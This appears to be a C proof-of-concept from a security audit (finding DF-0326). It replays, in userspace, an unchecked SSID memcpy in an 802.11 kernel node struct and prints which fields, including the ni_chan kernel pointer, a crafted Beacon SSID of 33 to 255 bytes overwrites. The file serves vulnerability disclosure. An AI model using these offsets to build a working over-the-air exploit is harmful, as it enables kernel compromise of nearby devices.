/*
 * DF-0326 - Code-level proof of the unbounded SSID heap overflow in
 *           ieee80211_node.c (ieee80211_sta_join :815-816 and
 *           ieee80211_init_neighbor :1521-1522).
 *
 * This program reproduces, in userspace, the EXACT memcpy that the two
 * vulnerable kernel functions perform, against a faithful replica of the
 * tail of `struct ieee80211_node` (copied verbatim, field-by-field, from
 * sys/netproto/802_11/ieee80211_node.h:176-196). It computes the real
 * offsetof() of every field after ni_essid and shows which fields a crafted
 * Beacon with ssid_len = 192 (and 255) overwrites -- in particular the
 * `struct ieee80211_channel *ni_chan` kernel POINTER.
 *
 * The live KVM guest has no 802.11 radio, so the kernel receive path cannot
 * be driven here. This program is the rigorous, line-accurate substitute:
 * if the kernel compiles this struct the same way (it does -- same types,
 * same order, LP64), the offsets printed below are exactly where an attacker-
 * controlled Beacon SSID lands inside a live `struct ieee80211_node`.
 *
 * Build:  cc -O2 -Wall -o node_overflow node_overflow.c
 * Run:    ./node_overflow
 */

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* ---- constants lifted verbatim from sys/netproto/802_11/ieee80211.h ---- */
#define IEEE80211_ADDR_LEN      6
#define IEEE80211_NWID_LEN      32      /* ieee80211.h:199 */
#define IEEE80211_RATE_MAXSIZE  15      /* _ieee80211.h:375 */

/* ---- ieee80211_rateset, verbatim from _ieee80211.h:377-380 ---- */
struct ieee80211_rateset {
    uint8_t  rs_nrates;
    uint8_t  rs_rates[IEEE80211_RATE_MAXSIZE];
};

/*
 * Tail of `struct ieee80211_node` -- the fields declared at
 * ieee80211_node.h:176-196, copied field-by-field with identical types and
 * order. `void *` stands in for the opaque `struct ieee80211_channel *`
 * (same 8-byte width on LP64). Everything after ni_essid is what an SSID
 * overflow walks into.
 */
struct node_tail {
    /* header (ieee80211_node.h:176-184) */
    uint8_t  ni_macaddr[IEEE80211_ADDR_LEN];        /* :177 */
    uint8_t  ni_bssid[IEEE80211_ADDR_LEN];          /* :178 */
    union {                                         /* :181-184 ni_tstamp */
        uint8_t  data[8];
        uint64_t tsf;
    } ni_tstamp;
    uint16_t ni_intval;                             /* :185 */
    uint16_t ni_capinfo;                            /* :186 */
    /* --- SSID element is written from here; overflow begins at ni_rates --- */
    uint8_t  ni_esslen;                             /* :187 */
    uint8_t  ni_essid[IEEE80211_NWID_LEN];          /* :188  <-- sink */
    struct ieee80211_rateset ni_rates;              /* :189 */
    void *   ni_chan;                               /* :190  <-- POINTER */
    uint16_t ni_fhdwell;                            /* :191 */
    uint8_t  ni_fhindex;                            /* :192 */
    uint16_t ni_erp;                                /* :193 */
    uint16_t ni_timoff;                             /* :194 */
    uint8_t  ni_dtim_period;                        /* :195 */
    uint8_t  ni_dtim_count;                         /* :196 */
    uint8_t  ni_meshidlen;                          /* :199 (next region) */
    uint8_t  ni_meshid[32];                         /* :200 */
};

/*
 * The offsets this program prints are only meaningful for the LP64 layout
 * the header describes. Refuse to build on other data models rather than
 * print numbers that do not match the kernel struct.
 */
_Static_assert(sizeof(void *) == 8,
               "node_overflow models an LP64 kernel layout; build for an LP64 target");
/* The overflow window is computed as "everything from ni_rates on", which
 * requires ni_rates to start immediately after the 32-byte ni_essid. */
_Static_assert(offsetof(struct node_tail, ni_rates) ==
                   offsetof(struct node_tail, ni_essid) + IEEE80211_NWID_LEN,
               "ni_rates must directly follow ni_essid");

/* Byte offset of member f from the start of struct node_tail. */
#define OFF(f)  ((size_t)offsetof(struct node_tail, f))
/* Where the vulnerable memcpy starts writing. */
#define ESSID_OFF  OFF(ni_essid)

/*
 * One row of the field table: a named byte range inside struct node_tail.
 * Rows whose name begins with a space describe sub-fields; the report loops
 * skip them.
 */
struct field_desc {
    const char *name;   /* label used in the printed reports */
    size_t      off;    /* byte offset from the start of node_tail */
    size_t      size;   /* width of the field in bytes */
    int         is_ptr; /* non-zero for the pointer-typed field (ni_chan) */
};

/* Every field from ni_esslen onward, in declaration order. */
static const struct field_desc fields[] = {
    { .name = "ni_esslen",               .off = OFF(ni_esslen),      .size = 1,                                .is_ptr = 0 },
    { .name = "ni_essid[32]",            .off = OFF(ni_essid),       .size = 32,                               .is_ptr = 0 },
    { .name = "ni_rates",                .off = OFF(ni_rates),       .size = sizeof(struct ieee80211_rateset), .is_ptr = 0 },
    { .name = "  ni_rates.rs_nrates",    .off = OFF(ni_rates),       .size = 1,                                .is_ptr = 0 },
    { .name = "  ni_rates.rs_rates[15]", .off = OFF(ni_rates) + 1,   .size = 15,                               .is_ptr = 0 },
    { .name = "ni_chan (POINTER)",       .off = OFF(ni_chan),        .size = sizeof(void *),                   .is_ptr = 1 },
    { .name = "ni_fhdwell",              .off = OFF(ni_fhdwell),     .size = 2,                                .is_ptr = 0 },
    { .name = "ni_fhindex",              .off = OFF(ni_fhindex),     .size = 1,                                .is_ptr = 0 },
    { .name = "ni_erp",                  .off = OFF(ni_erp),         .size = 2,                                .is_ptr = 0 },
    { .name = "ni_timoff",               .off = OFF(ni_timoff),      .size = 2,                                .is_ptr = 0 },
    { .name = "ni_dtim_period",          .off = OFF(ni_dtim_period), .size = 1,                                .is_ptr = 0 },
    { .name = "ni_dtim_count",           .off = OFF(ni_dtim_count),  .size = 1,                                .is_ptr = 0 },
    { .name = "ni_meshidlen",            .off = OFF(ni_meshidlen),   .size = 1,                                .is_ptr = 0 },
    { .name = "ni_meshid[32]",           .off = OFF(ni_meshid),      .size = 32,                               .is_ptr = 0 },
};

/*
 * Replay the kernel's unchecked SSID copy for one IE length byte and report,
 * field by field, which parts of node_tail the copied bytes land on.
 *
 * ssid_len - the SSID IE length byte (sp->ssid[1] / se->se_ssid[1]). On the
 *            wire it is a single byte, so values above UINT8_MAX are rejected
 *            instead of being silently truncated.
 *
 * The replica is allocated with UINT8_MAX bytes of slack after node_tail.
 * The slack is a stand-in for whatever follows ni_meshid in the real node.
 * It keeps even a 255-byte copy inside this process's own allocation.
 * Without the slack, lengths such as 192 write past the end of the calloc'd
 * object. That is undefined behaviour here, and glibc's _FORTIFY_SOURCE
 * checks can abort the memcpy before anything is printed.
 */
static void dump_overflow(unsigned ssid_len)
{
    if (ssid_len > UINT8_MAX) {
        fprintf(stderr, "dump_overflow: ssid_len %u exceeds the 1-byte IE length field\n",
                ssid_len);
        return;
    }

    /* node_tail plus room for the longest possible copy (ESSID_OFF + 255). */
    const size_t tail_len  = sizeof(struct node_tail);
    const size_t alloc_len = tail_len + UINT8_MAX;

    struct node_tail *n = calloc(1, alloc_len);
    if (!n) { perror("calloc"); exit(1); }
    unsigned char *base = (unsigned char *)n;

    /* Sentinel every byte after ni_essid (slack included) so clobbering is visible. */
    memset(base + OFF(ni_rates), 0xA5, alloc_len - OFF(ni_rates));

    /* Pre-overflow ni_chan value, simulating a real channel pointer. */
    n->ni_chan = (void *)(uintptr_t)0xDEADBEEF12345678ULL;

    /*
     * Same copy ieee80211_init_neighbor does at ieee80211_node.c:1521-1522
     *   ni->ni_esslen = sp->ssid[1];
     *   memcpy(ni->ni_essid, sp->ssid + 2, sp->ssid[1]);
     * and what ieee80211_sta_join does at ieee80211_node.c:815-816
     *   ni->ni_esslen = se->se_ssid[1];
     *   memcpy(ni->ni_essid, se->se_ssid+2, ni->ni_esslen);
     * ssid_len == sp->ssid[1] == se->se_ssid[1], attacker-controlled 0..255.
     */
    uint8_t beacon_ssid[2 + UINT8_MAX];
    memset(beacon_ssid, 0xCC, sizeof(beacon_ssid)); /* attacker-controlled bytes */
    beacon_ssid[1] = (uint8_t)ssid_len;             /* the length byte */

    n->ni_esslen = beacon_ssid[1];
    /*
     * base + ESSID_OFF is the same address as n->ni_essid. Addressing it
     * through the byte pointer to the whole allocation keeps the write a
     * well-defined in-bounds access while writing exactly the kernel's bytes.
     */
    memcpy(base + ESSID_OFF, beacon_ssid + 2, n->ni_esslen);   /* <-- the bug */

    /* One past the last attacker-written byte, as an offset into node_tail. */
    const size_t ov_end = ESSID_OFF + ssid_len;

    printf("\n=== overflow with ssid_len = %u (ni_esslen now %u) ===\n",
           ssid_len, n->ni_esslen);
    printf("  ni_essid sink is %zu bytes wide; memcpy wrote %u bytes -> %u byte OVERFLOW\n",
           (size_t)32, ssid_len,
           ssid_len > 32 ? ssid_len - 32 : 0);

    /* Show, per field, whether it was hit and (for the pointer) its new value. */
    for (size_t i = 0; i < sizeof(fields)/sizeof(fields[0]); i++) {
        const struct field_desc *f = &fields[i];
        /* skip sub-field lines for the "hit" tally */
        if (f->name[0] == ' ') continue;
        if (f->off == ESSID_OFF) {
            printf("  %-22s off=%-4zu size=%-2zu  [SINK] %s\n",
                   f->name, f->off, f->size,
                   ssid_len > 32 ? "overflows past end" : "fits");
            continue;
        }
        /* A field is hit when it lies past the sink and starts before the copy ends. */
        int clobbered = f->off >= OFF(ni_rates) && f->off < ov_end;
        if (f->is_ptr) {
            void *cur;
            memcpy(&cur, base + f->off, sizeof(cur));
            printf("  %-22s off=%-4zu size=%-2zu  %s  ptr=%p%s\n",
                   f->name, f->off, f->size,
                   clobbered ? "CLOBBERED" : "intact   ",
                   cur,
                   clobbered ? "  <-- ATTACKER-CONTROLLED KERNEL POINTER" : "");
        } else {
            printf("  %-22s off=%-4zu size=%-2zu  %s\n",
                   f->name, f->off, f->size,
                   clobbered ? "CLOBBERED" : "intact   ");
        }
    }

    /* Hex dump of the bytes that landed on ni_chan (the dangerous pointer). */
    if (ssid_len > 32) {
        const size_t chan_off = OFF(ni_chan);
        if (chan_off < ov_end) {
            printf("  ni_chan bytes after overflow (offset %zu): ", chan_off);
            for (size_t i = 0; i < sizeof(void *); i++)
                printf("%02x", base[chan_off + i]);
            size_t hit = ov_end - chan_off;
            if (hit > sizeof(void *))
                hit = sizeof(void *);
            printf("   <- %zu/%zu bytes of the channel pointer are attacker-controlled\n",
                   hit, sizeof(void *));
        } else {
            printf("  ni_chan at offset %zu is BEYOND the copy's end (offset %zu) -> not reached\n",
                   chan_off, ov_end);
        }
        if (ov_end > tail_len)
            printf("  %zu bytes land past the end of node_tail (offset %zu), beyond the fields modelled here\n",
                   ov_end - tail_len, tail_len);
    }

    free(n);
}

/*
 * Print the modelled layout, then replay the SSID copy at lengths derived
 * from that layout:
 *   - the legitimate maximum;
 *   - a copy ending exactly at the end of ni_rates;
 *   - the shortest copy that touches ni_chan;
 *   - the shortest copy that covers all of ni_chan;
 *   - the finding's 192-byte payload;
 *   - the 255-byte maximum.
 */
int main(void)
{
    /* Byte distance from ni_essid[0] to the first byte of ni_chan. */
    const size_t chan_dist = OFF(ni_chan) - OFF(ni_essid);
    /* Shortest SSID length that overwrites every byte of ni_chan. */
    const size_t chan_full = chan_dist + sizeof(void *);

    printf("DF-0326: ieee80211_node SSID heap overflow -- code-level proof\n");
    printf("struct node_tail size = %zu bytes (LP64)\n", sizeof(struct node_tail));
    printf("Offsets (from start of node_tail):\n");
    for (size_t i = 0; i < sizeof(fields)/sizeof(fields[0]); i++) {
        if (fields[i].name[0] == ' ') continue;
        printf("  %-22s off=%-4zu size=%-2zu%s\n",
               fields[i].name, fields[i].off, fields[i].size,
               fields[i].is_ptr ? "  (kernel POINTER)" : "");
    }
    printf("\nni_essid -> ni_chan distance = %zu bytes\n", chan_dist);
    printf("=> an SSID of length >= %zu fully overwrites ni_chan.\n", chan_full);

    dump_overflow(32);                      /* exact-fit, no overflow -- the legitimate max */
    dump_overflow(48);                      /* 32 + 16-byte ni_rates: stops before ni_chan */
    dump_overflow((unsigned)chan_dist + 1); /* shortest length whose bytes reach ni_chan */
    dump_overflow((unsigned)chan_full);     /* shortest length covering all of ni_chan */
    dump_overflow(192);                     /* the finding's cited payload */
    dump_overflow(255);                     /* the absolute maximum ssid[1] byte */

    printf("\nVERDICT: ni_essid[32] is overflowed by any Beacon whose SSID IE\n");
    printf("length byte exceeds 32. ni_rates (offset %zu from ni_essid) and the ni_chan kernel\n",
           OFF(ni_rates) - OFF(ni_essid));
    printf("POINTER (offset %zu from ni_essid) are both attacker-writable.\n",
           chan_dist);
    return 0;
}
